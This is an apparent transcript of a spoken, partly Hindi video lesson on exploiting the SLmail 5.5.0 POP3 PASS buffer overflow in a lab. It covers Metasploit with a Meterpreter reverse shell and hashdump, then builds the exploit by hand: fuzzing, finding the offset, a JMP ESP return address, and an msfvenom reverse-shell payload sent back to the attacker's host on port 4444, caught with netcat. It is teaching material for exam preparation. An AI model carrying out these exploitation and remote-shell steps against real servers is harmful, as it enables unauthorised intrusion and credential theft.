Hello everyone. This time we will see a buffer overflow example and we'll learn the concept of buffer overflow. So what exactly means buffer overflow? Let's go through it. Buffer overflow are one of our favorite topics in this course. So it's taken from a course called as OSCP. We always find it fascinating to think about the very precise procedure that occurs when an exploit is used to execute code remotely on a victim machine. The module will walk through a live example of a buffer overflow and then proceed through various stages of the exploit development lifecycle. When discussing buffer overflow, some of the questions that arises are how are these bugs found? The one question. The second one is how did you know that X byte in the Y command would crash the application and result in a buffer overflow? So, generally speaking, there are three main ways of identifying flaws in application. If the source code of the application is available, then the code review is probably the easiest way to identify bugs. If the application is closed source, you can use reverse engineering techniques of fudging to find the bugs. Moving on, this comes to as what is fuzzing? Fuzzing involves sending malformed data into application input and watching for unexpected crashes. An unexpected crash indicates that the application might not filter certain input correctly. This could lead to discovering an exploitable vulnerability. So let's moving on to the history. We'll go for the vulnerability history. The following example that I'm going to talk about is demonstrating simplified fuzzing in order to find a known buffer overflow vulnerability in the SLmail 5.5.0 mail server software. The buffer overflow was found back in 2005 and affected the POP3 pass command, which is provided during user login. This makes the vulnerability a pre-authentication buffer overflow, as an attacker would not need to know any credential in order to trigger this vulnerability. The SLML software was compiled with data execution prevention, that's step, or address space layout randomization ASLR support, which makes the exploitation process simpler as will not have to bypass this internal security mechanism. So let's talk about something about data execution prevention DEP or ASLR. You can Google that. It's no need to tell. What I would so let's say we'll talk something about a deep SLR and DEP. So DEP is a set of hardware and software technology that perform additional checks on memory to help prevent malicious code from running on a system. The primary benefit of DEP is to help prevent code execution from data pages by raising an exception when execution occurs. So that's DEP. And ASLR randomize the base address of a loaded application and DLLs every time the operating system is booted. So ASLR DEP should be false. That's you need to remember. Interacting with POP3 protocol, let's don't talk about this. We'll interact, we'll copy this, and we'll have a program which will just test for like user as test and pass. Before that, I need to set up my machine. Its call is ready. Then what do you have? Other one, that one is my 32 machine. In that, POP3 is ready. So I need to check from here if I'm able to connect to prop 3 or not. That's the question. Something else is going on in this. Okay, restart letter. Finish. I'm trying to do something else. Okay, so I'll show you just a small script NV192.168.1.111.110. That's pop3. You can see the banner of this pop3. uh, or that it's showing this pop this out is okay. So we'll have some to interact with some users. So okay, this password test unable to log, so it's not there. So before going to the entire process of vulnerability, I can show you that this particular, let's run the Zenmap and I'll show you that the 110 is open on 192.168.1.11 machine. Let's have this a little complex of ST. I'm taking as a Windows machine, so I'll take some SV. I'll port, let's say, 1 to 65,535 ports. I'll try to look into and scan it. Once I'll scan this thing, I'll find out that you can see that 110 is open, it's showing up. 139 is open, 445 is open. I can show you that what exactly the Windows is. It will tell you also the exact version of the operating system, and it will tell you the SLmail version also. So this is just nothing but the banner so information gathering, the phase that's called as enumeration. Gather as much as information as possible for the target machine to start our process of compromising the target. So it will take a little bit of time for this to get a map scan. Oh, or something wrong in this scan. STSV हो गया P 1,265,535 and this then scan. So while the scan is going on, I know that there's a vulnerability is there, so I'll just exploit the vulnerability with the help of Metasploit tool, which is already installed in Kali Linux. Before starting the Metasploit, I need to start the service PostgreSQL, so it's the DB that's connects to the Metasploit. So here I'll search for SLmail. We get some pretty simple exploit for SLmail. Yep, I got it. So this is the exploit that I am going to use for SLmail. So I'll say that, let's say upon use, then I'll go for show options. I'll have the options set our host 192.168.1.11 is the target host. I need a payload, so I'll put directly set payload. I'll use Windows slash meter priori meter peters slash reverse underscore TCP. I'll use that. Let's show the options. What do we have it? Okay, set L host. That's my IP address. I need to check. What is my IP address? It's 9. These all are internal networks. I'm hosting it up. So it's gone. We have. Let's show the options that we have. Let's keep it this thing a little bit up. So we have on our host is target. It's the target box. We're holding on 110 POP3, and I'm sending a Windows Metabit reverse TCP payload, which is exit function is equal to thread. Why I'm saying this exit function, you'll come to know when we'll prepare the payload manually. So I'll just put this exploit. It'll start exploiting, and it will finding the stage. We got a metabita. So I'll go sysinfo. Windows is in my hand. I can do who am I? That's not necessary command. I'll see that command. Okay, what we can do with this? We can do a lot of things. So this is the easiest way that you can get it. Very easy. So you will get everything. Let's say I need to say get prev. Sorry, the command is something else. Seriously, I don't remember this command. I don't want to. Somewhere they will write to see the privilege. Get privs. Get privs. So I do have this many privilege. So that's fine. I can do hash dump. There's another part that will show you that how to crack Windows machine, specifically Server 2008, using this technique called PTH clients. We have a lot of PTH clients. So PTH is just shoot, and I'll show you that shoot. So to type PTH. This is the suit actually that we have in Kali. So I'll show you in PTH WinExe that how I can enter into any Windows Server 2008 machine which is not a service pack of more than third service pack. I can show you that, but this is pretty easy, pretty simple. I'll just exit it, exit, and as it is a thread function, so it will not interrupt anything in this server. So server will be running, nothing happened actually. It won't think anything, nothing happened. So this is the process of cracking a box and going into the we have done the hash term, so we can log into the system by cracking the hash using John the Ripper is a good tool. And next, moving on, let's to show this. This is quietly done within 10 to 15 minutes of time. And the same thing, we need to write the exploit starting from the beginning itself. And I don't have things so that I have kept anything written over here. No. So we have this. Okay, got stopped and started. Before going to this, I'll show you something that I do have for you people. Let's tell them the exact thing that we do in buffer overflow. Let's take this application. Let's copy this out. Let's copy that out application and we just go to that application. Let's see what that application does actually. I'll show you the code. Let's say I'm passing this. Sorry, nothing is happening. If I'll pass more, something happened, right? What's that? Let's go deep into the program. Can we have the program, please? If you go deep into the program, you'll get to know. I'll show you the program that I have. I don't think so, that program that I have it or not. Let's open this up. Yes. So this is the program what I'm just running it up. There's just an exe file that I made it and run it up. To give you a better look of that, let's have something called as Oli debugger. Let's have this out, Oli debugger. It will help us out with the kind of purpose of debugging. I have a 32 machine. I need a 32 bit of downloading Oli debugger file. Nothing will happen in these files. So I'll download this Oli debugger, and in Oli debugger I'll show you that if that is running, so what will happen. I need to download. I'll download this one. This is final version. Don't need to do anything in Oli debugger actually. I just open up the zip and it's already being installed. So you don't need to do anything. That's quite. You should have actually a little bit of knowledge of all these tools. Let's say as debugging tools. This will help you out in the time of debugging. Let's go to this folder. This have. We'll just extract it to Oli debugger. Okay, we need this actually. Can open directly. We'll just send to this desktop as a shortcut. Yep. In Oli debugger will run as administrator. This needs some administrative privilege. Just open up. I'll open up that I have in desktop. I'll just pass 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 A's. I'll pass more. I will pass 80 A's. 10. 20, 30, 40, 50, 60, 70, 80. I just open it up. Don't bother about all this. I just have an appearance look font to do this so it will be visible. Good. So you will be now visibling this is paused. Okay. So now you can see that the EIP it points to 00401091. That's this part. This push ESB, and we have the code running, starting running. The main function starts running from here. Oh shit! The main function starts from here. Uh, okay. This will be main. It's gone. That part. Main function. You need to put a breakpoint in main function so that you can see what's happening. Argument it's passing, switch case it's happening in the top. So I'll just run it out. So now you can see that EIP is pointing to something called as 41, 41, 41, 41, which is all our A's. And now ESP, if you go to follow the dump of ESP, you can see ESP is pointing to A's, right? So what does just happen? So EIP and ESP, let's talk something about just just say ESP and EIP functions. So ESP is something but that you know that is extended instruction pointer. So when you run when the program starts running, so it will put up it will start the execution where the EIP points to. So wherever the EIP is, it will point that particular memory location. So ESP also holds that is extended stack pointer. So why we need ESP over here? We'll talk about that later. So this is how this Oli debugger is and looks like. We'll move on to something else. It's called as just download something called as Immunity Debugger. We have an Immunity Debugger. We will use also Mona script in Immunity Debugger. Immunity Debugger is a good tool. Uh, this is very hectic actually. They always ask this question. I don't know why. Because but they don't verify the questions actually. So this second part of Immunity Debugger need also a Mona script, right? I'll go to that right here. Mona script. I'll tell you why Mona script, what it helps in Mona script. I know. This is GitHub. Mona script, GitHub. I need that mona.py script. Uh, so our emoji debugger is done. Once it get installed, we'll install our Mona script also. We'll install Python also. It requires. So Python is good. Good to learn also. You have plenty a lot of tools that from where you can learn Python. Yep. So till the time it get installed, we'll just open up the Mona script, extract to Mona, Mona.py. I need to put this one in my where that program files, where that immunity debugger libraries. Not libraries, it's py command. We should not put this into libraries. It won't work. You should put this into this. Py command. Okay, now just open this solid debugger, sorry, email debugger in administrative mode so that you can see all processes. We'll attach SLmail process. You'll have some process. We'll check there. Here you go, SLmail attach. You can see it's got paused. Now it's running. Let's create some script which will give a buffer overflow. Let's say nano slmail.py. We just check at what point of time it will break. So before that, just a little bit of hands-on on Python scripts. So we'll start with slash user slash bin slash bash import socket. Let's say s is equal to socket dot socket socket dot if inet comma socket dot sock underscore stream. S is equal to socket dot socket. Let connect statement connect. No. Let's check this. That what he is writing actually. S is equal to socket or socket this. Oh, Python. I need to write that one also. Python script socket.af inet socket.sockstream. Try this. Import socket. We'll not try this. We'll try something else. We'll try this one. I don't know whether I can copy and it. I don't think copy paste option is allowed in my virtual machine settings. No. So I need to write this up. That's very interesting. Fine, we'll learn something while writing. Buffer will take a buffer as a. I'm also learning. We'll have a counter equal to 100. That's this. While length of buffer less than equal to 30, you do something. Buffer.app end append a ए को कितना बार अपेंड करना है? स्टार काउंटर, जो काउंटर है उसके हिसाब से इसको अपेंड करनी है। काउंटर इज इक्वल टू काउंटर इज इक्वल टू काउंटर प्लस 200, 200 के हिसाब से काउंटर बढ़ानी है। फॉर स्ट्रिंग इन बफर, स्ट्रिंग बफर हो तो प्रिंट कर दो कि फजिंग पास विथ परसेंटेज एड्स बाइट्स। ये बंद करके लेंथ, स्ट्रिंग लेंथ भी दे सकते हो ना। परसेंटेज लेंथ स्ट्रिंग, परसेंटेज len, परसेंटेज len string. ये सीधा स्ट्रिंग का लेंथ निकाल लेगा। ठीक है, सॉकेट इज इक्वल टू सॉकेट, ये तो मैंने लिख दिया। कनेक्ट इज इक्वल टू स्ट्रिंग, ये मैं आईपी एड्रेस यहाँ पे हार्डकोड कर रहा हूँ, लेकिन ये हार्डकोड नहीं करना है, यूजर से इनपुट लेना है। कॉमा करके रहता है ना। s dot receive 1024, s dot send, s dot, oh shit, s dot receive equal to, no, s dot receive 24, s dot send user test s dot recv 1024 s dot send। मैं क्या सेंड करने वाला हूँ? पास स्पेस बनकर प्लस अपन को यहाँ बफर ही भेजना है ना, स्ट्रिंग ही भेजना है। और ये स्ट्रिंग है क्या? स्ट्रिंग प्लस एन एस डॉट सेंड। क्विट नहीं करेंगे क्या? एस डॉट क्लोज, this is the program control x, yes, so chmod slmail.py executive permission a plus x python slmail.py। some invalid syntax। oh, क्लोज का स्पेलिंग गलत था, सॉरी। कभी कभार हो जाता है स्पेलिंग गलत। You can see that we are passing, the buffer is increasing. Now it's sending 500 bytes more it will send 700 bytes, 900 bytes. So every time it is increasing 200 bytes. What we are doing is we are trying to see that when the server is getting crashed, at what point of time the server is getting crashed. That's what we are looking for. We'll come to a point. This is what we are doing is fuzzing. We are sending more number of bytes to that particular variable to check that at what point of time it crashes. So once it get crashes, we'll see that that point of time it get crashes. All these machines are full screen. So it's after 2900 bytes, it's stuck and it's thinking that whether it is going to the next byte or not. We'll write some print statement that we are done. So that will be very cool. So this is how we just started writing an exploit. Uh, People generally don't means the exploit writers are somewhat different. They write so they again they do the research, then they write. So that are different. So it's just and I'm not saying that I am an exploit writer, but I want to become an exploit writer some days. But just it's just an start up. It's not just the beginning, you can say. So if you see, if you go to that other machine that we have, Windows, it got paused and it's showing 41, 41, 41, 41. So its application got crashed. The application got crashed, that's why it's not responding to my enter spike. So we came to know that in 29 means 20. Let's put this to 2700. Let's see what's happening. Let's change this. In buffer itself, we'll just put into 2700. And in place of string, let's in place of string, we'll pass buffer and pass with bytes name with 2700 bytes. Not find this interesting. We'll have a not quit. We have a job done here. Job done. Right. Let's fashion this out a little bit. Yeah, let's fashion this up. So what we're doing is we're just direct sending buffer of 2700 bytes. So it's not necessary that I'll put this in bracket. It can understand. So before running that, I need to go here. I need to stop this. I need to stop this. I need to start it again. I need to start the debugger and see whether what is happening. Debugger opens, attach, SLmail. Remember to run this one because time first when it runs it will be in pause mode. So let's start like Python. So it got paused 41, 41, 41. I need to write a closing connection statement. Uh, just you don't receive anything after this. I need to receive something. Let's open SSH here so that I can connect from there. There's no need to. I'll come back and forth again here. So in same machine I can do. Need to download putty. Putty is a very good tool. Connect to your SSH. I don't want all time. I'll go to that machine and come back here again to this machine to show all this. Let's have putty and let's do this all here. Okay, Google putty, install putty, run. I need this. Okay, actually I need that shortcut in desktop. Oh, that's okay. That's fine. Once I'll connect to putty, then I can see. So if you'll, oh shit, if you'll go to our debugger and see, if you see this, access to appearance, font. Okay, so if you see this, it's overloaded by 41, 41, 41, and if you see that ESP, if you go to dump of ESP, and ESP is pointing to some of these A's. So after means ESP will hold the value. ESP will hold the value of the address which the EIP need to perform. Let's connect to putty. Let's connect to that machine through putty. 192.168.1.6. Let's put it as, I'll save this setting. Save and go to SSH. I'll enable this. I'll open. Did 6 or something else. It's 9. I need to go to 9. Load. I don't need this enabling X forwarding, but still, if you want to open something, you need X forwarding. Let's log in as root. Always it will say access denied. So I've created other user. SSH login user. Fine, so we are here. We'll go to super user. Fine, fine. So we'll have our SLmail here. You can see SLmail, so it will be easier for me. Without switching the machine, I can start and stop and restart, and whatever I want to do, I can do. So we need to find out now the exact position of where this happens. So we need to create the pattern. So for that, we have a pattern create tool. You need to say the tool that what exactly you want. I need 2700 pattern. Let's check in that machine because I'm here. So if I'll use this, let's try this for users. The length of pattern, so we need to put hyphen L 2700. This pattern I need. This thing I can not do that there because I need to put this pattern into the script. So these are all identical patterns. We'll go to nano SL mail instead of buffer. We have another buffer. This will be this. This will be the buffer, not this one. So we will be sending this. So we will be sending that, means we'll send the same class, will create it, but instead of 41 41 41 we have a certain values that will be there so that we can identify among 2700 where exactly the position is, where it is overriding the EIP. The same process starts again. At need SLmail, somewhere it will be there, attach and play. That's now it's running. Go to this putty. My program is ready. Okay, now I'll hit Python slmail.py. Oh, sorry, py Python slmail dot directly is 27 bits passed, and you can see that it's overwritten with 39694438. So it got paused. Still, I need to write a statement, connection close statement. I need to write that statement here over here. So now we have another one tool to get the offset value of this, that's called as locate pattern offset. So here we'll find this pattern offset value. We'll give 39, 69, 44, 38. Where exactly it exists? Let's try with help. We'll query 39, 69, 44, 38. Where exactly it exists? So, bingo, we got this. So it's exists in 206. So we'll send 206 now. So instead of this, I'll put it, I'll open this. So 2606, that A is getting out. I'll have B's into 4. I'll have rest all our C's into, let's just left 27, oh sorry, 20, oh sorry, 2700 minus 4 minus जितना ही होगा minus 2606. Python will take care of my math. Let's start this process again. Let's see if we are successful to get the B there or not. Let's start it again. Let's start the email reader again. I need SLmail and run this mail. What I do, I just need to trigger this. Python slmail.py. So now it's on B, right? Fuzzing passed with 2700 bytes, and we are getting this as B. Yeah, need to remove that. Not closed, needed receive. Directly I can close it. Not not this. So you can see that so B's are coming up, so we are clear that okay, after 2606 the next 2607, 2608, 2609, 26010 are overriding with this. So if you can go here, I'll show you. You can see that we'll go to this ESP term, so you can see it's all our C's. It's filled with C's. So what you need to do is if you need to pay some, if you need to put one payload, so we need some buffer to place our payload. So this is 2700 what we have tested it. We'll tested it for some more buffer, let's say 3500. I'll just try because payloads are very large. Minimum is 351. So what we'll do is we will increase our buffer. We'll try to see if it is taking more buffer or not. If yes, then it's good for us. We'll have more space. So let's go to the program. Let's go to the program. Let's put it as 3500. Let's run that. Let's see what's happening. Now we got enough space of C to place our payload, right? Great. So now what the thing left is right. You need to change your ESP address to EIP so that it keeps continuing. The things that you can do is you can directly hardcode this. There's 0 to 41, A1 and 28. You can place it in EIP. But if I'll restart this will open up in another thing. So it can't work at this point of time. So what I need to do is I need a jump statement in the what are you going to I need a jump statement in the application where it is. I need a jump statement in SLmail. Stop, start. So do I have an SLmail coming up? Yeah, in this SLmail, I need a statement called as execution statement, not length. I need a statement called as jump esp unknown finder. I cannot find this. So let's go to module. Yep. Here I need to find search for command. Let's say jump esp command. Yep, we have found it as here. So there's a jump esp command is 7769 E871. This is in SLmail exe module. So what we'll do is we will copy this, copy to clipboard. We'll place this in a notepad. So 7769 E871, that is the place. What we'll do is we'll put that place here. So that will be my 7769. Oh, sorry. 7769 E871 E871. This position, that is your, it will be your FFE4 E4 register. So that is another process, I will tell you that. So while writing in the point of C, we'll write not into 4, we'll write directly slash x71 slash x e8 slash x 69 slash x77, because it is Little Indian format. So you just wanted to know that it should go here. Let's try that out. We'll put a breakpoint here, toggle it, and just run this. So once it will come here, it's running. Just fire this up. So now it is showing in. Now it stopped in 776740F1, which says as jump ESP. It's running. It's not doing anything. It's still running. So if I'll see 7, okay. Why it's not sending? Something interesting happening. application. Let's go to the breakpoint. Jump ESP. No, not that. And at this part, I need to go to breakpoint toggle. I'll just break it up. Play. The application is playing. And I'll go here. I'll go and change. I'll go to the instead of B. I'll put. Let's check there what she's putting. Instead of B, it's chasing the bad character. That part I'll put it to U. So it's finding JS in this particular, but we found it directly. So slash x8f. I just wanted to know slash x71 slash x e8 slash x69 slash x77. So it got paused. So when it got paused, so we are in jump ESP. So it's now jump ESP statement will just directly file execute, debug and step. So it's now showing me my place to C. So I can execute it. So it's very easy. This is where the place where I'll put my payloads. Let's go to the machine and put some payloads. I'll show you the brief description of creating the payloads. Let's clean it up. Some MSF Venom with the payload. I'll use Windows slash not beta Windows slash shell underscore reverse REVRS reverse underscore TCP. L host will be my host 192.168.1.9. L port will be my port 4444. Let's say manage format. I want C format. I remove bad characters. Get taken care about x00 slash x0d slash x0a. I already found this out, and I know its architecture is x86, and I know this platform is Windows, and I'll encrypt it x86 slash shikata ga 9. Let's see what's happening. If I given everything correct, it will give me the payload in C format so that I can inject it into my exploit that I have written. Yes, it give. So you can see this payload size as 351. I'll give this size payload. Just put this payload into nano SL. We'll have some place for this payload. Let's create a variable payload equal to And this will be my payloads too much. Yeah. So payload came. So instead of C, my buffer will contain payload. Let's add this up, and my payload is 351. I'll have some C's, and I'll separate 18 also because I'll add some knobs before my payload. X90 into 18 plus. So I'll add some knobs here. So then it will go and it will execute. Well, not 18 knobs will be more. So our program is now ready. Just got paused. Fine, we'll close this. Let's stop this out. I'll start this up. I'll start it up. I'll start the immunity debugger again. I'll attach the SLmail. I will go to that point. I'll put a debug breakpoint. I'll put so that when it triggers, it will come there. We'll see what's happening. Just trigger it out. It got paused because it is there. If I'll select play, let's jump PSP. It's running. That's strange. It should run actually. It should. Wait a second. It's got crashed, I guess. Buffer overflow. This thing happens when you tested it. Sometimes it got crashed. A lot of times happens. So in exam, you need to be more curious that you have very less time you can reboot the system. Let's jump onto that. Put a debug breakpoint. Run this thing and run my payload. So this got paused because it's 7.1. Got play. Immunity debugger is stopping up. It's happening actually. Let's show without the debugger. I'll show you that how it is happening. I'll go to that machine. We will open a netcat listener, the port that we have used for 4444. So anyone is trying to connect to this, we'll go on this. So we'll just use Python. So it's not stopping. We got an SLmail. Oh, so it's keep hitting. We got this. If you say who am I, this you have this authority. This. So this is what how we have done using the buffer overflow. The script is this one that I have used in front of you. I have created the script. I have changed. I have used the payload, and job done. That's what is your buffer overflow vulnerability. So you got a root access to the system. If you exit, exit. Fine then. This is all about buffer overflow vulnerability, and this is Shyam. Thank you.